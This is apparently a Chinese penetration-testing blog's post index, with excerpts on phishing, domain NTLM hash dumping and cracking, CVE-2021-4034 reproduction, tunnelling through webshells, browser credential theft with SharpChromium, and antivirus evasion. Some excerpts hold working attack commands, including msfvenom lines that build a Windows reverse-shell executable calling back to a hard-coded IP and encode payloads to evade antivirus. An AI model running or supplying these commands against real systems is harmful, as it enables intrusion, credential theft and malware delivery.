内网渗透
安全大哥
接渗透测试,护网,安全咨询,安全培训,安全溯源,应急响应等业务,需要私信我
展开
-
关于钓鱼攻击和防范这些事
本文将从攻击、检测处置和防范三个维度,分别介绍钓鱼攻击方式、钓鱼邮件安全事件运营及防范措施。原创 2023-03-08 14:40:06 · 1825 阅读 · 0 评论 -
域内ntlmhash导出与破解
1、如何使用powershell导出域内所有用户的ntlmhash。2、如何使用hashcat将其ntlmhash进行爆破。原创 2023-02-01 15:09:11 · 457 阅读 · 0 评论 -
Uber攻击流程
1、月初Uber被入侵,下面是整个大概的攻击流程图。原创 2022-09-20 15:29:50 · 204 阅读 · 0 评论 -
关于Navicat的一些使用场景
比如你现在拿到一个目标机器的webshell,然后拿到了这个机器的mysql数据库的口令,但是目标机器mysql默认只能使用127.0.0.1连接,不允许外部ip连接,而且我们拿到的webshell不方便去操作数据库,这个时候可以使用我们的navicat的httop隧道功能进行操作。比如你已经拿到一台跳板机A的权限,然后上传fscan到跳板机器扫描到内网B段很多数据库的弱口令,这个时候你想使用本地的navicat去连接数据库,这个场景的话可以使用navicat的ssh隧道去链接。...原创 2022-08-26 11:56:04 · 561 阅读 · 2 评论 -
一条通往服务器所有端口的隧道
通常为了安全,服务器需要通过跳板机访问,服务器对外网暴露的端口也严格限制。这种情况下若要在本地访问服务器上的服务或系统就会比较蛋疼。有一个简单的解决方案,就是在本地和跳板机之间建立SSH隧道。SSH隧道提供了一个网络代理服务,通过该代理服务可以直接访问跳板机所在的局域网,即服务器上的任意端口,服务都可以直接访问。本文介绍的方法比一般的端口映射更方便,不需要为每个端口配置一条SSH隧道,包括Windows、Mac、Linux上的操作方法。非常简单,只需一条命令即可建立SSH隧道。ssh user@h原创 2022-06-29 11:43:56 · 1097 阅读 · 0 评论 -
CVE-2021-4034漏洞复现
1、漏洞POChttps://github.com/berdav/CVE-2021-40342、漏洞复现下载poc-编译代码-执行exp即可。git clone GitHub - berdav/CVE-2021-4034: CVE-2021-4034 1daymake./cve-2021-4034原创 2022-02-19 09:17:40 · 3882 阅读 · 0 评论 -
收集邮箱地址的在线网站
网址如下:https://app.snov.io/domain-search?name=za.group&tab=emails比如我搜索一下"360-agence.com"这个域。搜索结果如下:原创 2021-07-13 16:35:04 · 1742 阅读 · 0 评论 -
【浏览器密码窃取工具】SharpChromium
github项目地址:https://github.com/djhohnstein/SharpChromium1、SharpChromiumSharpChromium是一个.NET 4.0+ CLR项目,可从Google Chrome,Microsoft Edge和Microsoft Edge Beta检索数据。目前,它可以提取:Cookies(JSON格式) 历史记录(每个历史记录项目都有关联的Cookie) 保存的登录名注意:所有返回的Cookie均为JSON格式。如果您安装了扩展程.原创 2021-03-16 16:00:21 · 1081 阅读 · 0 评论 -
渗透系列之内网渗透密码收集思维导图
渗透系列之内网渗透密码收集思维导图:网盘下载地址:原创 2020-09-19 14:42:48 · 1396 阅读 · 0 评论 -
Windows NetLogon权限提升漏洞(CVE-2020-1472)
漏洞描述微软官方于8月12日发布安全更新,其中修复了一个修复了NetLogon权限提升漏洞(CVE-2020-1472),攻击者通过NetLogon(MS-NRPC),建立与域控间易受攻击的安全通道时,可利用此漏洞获取域管访问权限。成功利用此漏洞的攻击者可以在该网络中的设备上运行相应代码或者程序。同时,微软8月补丁中还涉及其他多个高危漏洞,Windows 用户尽快安装补丁阻止漏洞攻击。漏洞评级CVE-2020-1472 严重影响版本Windows Server 2008 R2..原创 2020-09-15 10:55:31 · 1526 阅读 · 0 评论 -
各类杀软对应的进程名
原文链接:https://www.cnblogs.com/hookjoy/p/10899119.html {"360tray.exe", "360安全卫士"}, {"360sd.exe", "360杀毒"}, ...转载 2019-06-17 18:04:39 · 5256 阅读 · 0 评论 -
windows使用命令执行exe文件
很多时候我们需要在目标windows的机器上执行exe文件获取meterpreter,这个时候只需要执行一条简单的命令进入木马的文件夹,执行 start+空格+xxx.exe原创 2018-11-12 11:26:06 · 23081 阅读 · 0 评论 -
msf拿到windows的shell显示乱码解决方法
0x01:渗透的时候拿到一台windows7的权限,但使用msf显示乱码,很不舒服 0x02:使用 chcp 65001 这条语句即可解决原创 2018-11-02 15:28:52 · 13516 阅读 · 7 评论 -
Metasploit常用操作
payload的几个常用生成 1、生成windows下的反弹木马msfvenom -p windows/meterpreter/reverse_tcp LHOST=60.205.212.140 LPORT=8888 -f exe > 8888.exe-p=payload -f format -o path 2、监听use exploit/multi/handler...原创 2018-11-02 15:05:25 · 586 阅读 · 1 评论 -
Metasploit框架的学习一之目录结构
首先是介绍整个框架的结构:0x01:最重要的目录是data,modules,scripts,tools,plugins1:我们先进去data目录,该目录包含大量有用的模块,如meterpreter,exploits,wordlists,templates等等我们重点注意meterpreter这个模块,这个通常用于后漏洞利用的功能当中。2:然后我们进wordlists目录,这里面包含了大量的字典3:...原创 2018-06-08 15:37:04 · 2295 阅读 · 0 评论 -
木马的伪装与免杀
0x01:我们依靠msf生成简单的shellcode免杀msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform LHOST=XXX LPORT=XXX -e x86/shikata_ga_nai -i 12 -b '\x00\' PrependMigrate=true PrependMIgrateProx=svchost.exe ...转载 2018-04-19 11:19:14 · 9832 阅读 · 11 评论 -
初识内网渗透
参考文章:https://www.anquanke.com/post/id/86505http://www.freebuf.com/sectool/56432.htmlhttp://www.freebuf.com/articles/network/125278.html原创 2018-04-16 11:35:54 · 475 阅读 · 0 评论